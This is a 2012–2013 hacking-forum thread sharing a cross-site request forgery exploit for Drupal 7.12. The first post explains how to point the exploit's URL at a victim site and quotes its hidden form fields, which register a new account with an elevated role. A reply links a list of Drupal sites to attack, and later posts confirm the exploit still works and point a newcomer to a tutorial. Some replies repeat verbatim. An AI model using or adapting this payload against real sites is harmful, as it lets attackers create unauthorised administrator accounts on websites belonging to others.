+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities (/Thread-Drupal-CMS-7-12-latest-stable-release-Multiple-Vulnerabilities)
Pages:
1
2
Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - 1llusion - 04-07-2012
Hello!
I've came across this on exploit-db. All credits go to: Ivano Binetti (http://ivanobinetti.com)
Link to exploit: http://www.exploit-db.com/exploits/18564/
Its pretty much explained there.
For better understanding I've split the link here:
Code:
<drupal_ip> = This doesn't have to be necessarily the IP. It can be domain.
:80 = not really needed as port 80 is default. You may want to change it if different port is used.
/drupal/ = Directory where drupal is installed. You may want to change or delete it
admin/ = Directory where admin CP is installed. Many websites will have it as default.The rest should be clear.
IMPORTANT! DON'T CHANGE THESE:
Code:
<input type="hidden" name="status" value="1"/>
<input type="hidden" name="roles[3]" value="3"/>
<input type="hidden" name="form_build_id" value="form-oUkbOYDjyZag-LhYFHvlPXM1rJzOHCjlHojoh_hS3pY"/>
<input type="hidden" name="form_token" value="cU7nmlpWu-a4UKGFDBcVjEutgvoEidfK1Zgw0HFAtXc"/>
<input type="hidden" name="form_id" value="user_register_form"/>
<input type="hidden" name="op" value="Create new account"/>RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - W0rM - 04-09-2012
Go ahead...
Find some sites here
Code:
http://www.drupalsites.net/
moke::p
RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - d3v0id - 02-09-2013
Does it work still or fixed ?
RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - d3v0id - 02-09-2013
Does it work still or fixed ?
RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - d3v0id - 02-09-2013
Does it work still or fixed ?
RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - 1llusion - 02-09-2013
(02-09-2013, 05:13 PM)d3v0id Wrote: Does it work still or fixed ?
It will work for the mentioned version. Newer versions are most likely patched.
RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - 1llusion - 02-09-2013
(02-09-2013, 05:13 PM)d3v0id Wrote: Does it work still or fixed ?
It will work for the mentioned version. Newer versions are most likely patched.
RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - 1llusion - 02-09-2013
(02-09-2013, 05:13 PM)d3v0id Wrote: Does it work still or fixed ?
It will work for the mentioned version. Newer versions are most likely patched.
RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - Sherazkhan98 - 03-09-2013
how to use it.....em new on this forum
RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - 1llusion - 03-09-2013
(03-09-2013, 05:43 PM)Sherazkhan98 Wrote: how to use it.....em new on this forum
Look into CSRF. I've made a little tut on my blog: http://blog.1llusion.info/2013/01/trolling-with-cross-site-request.html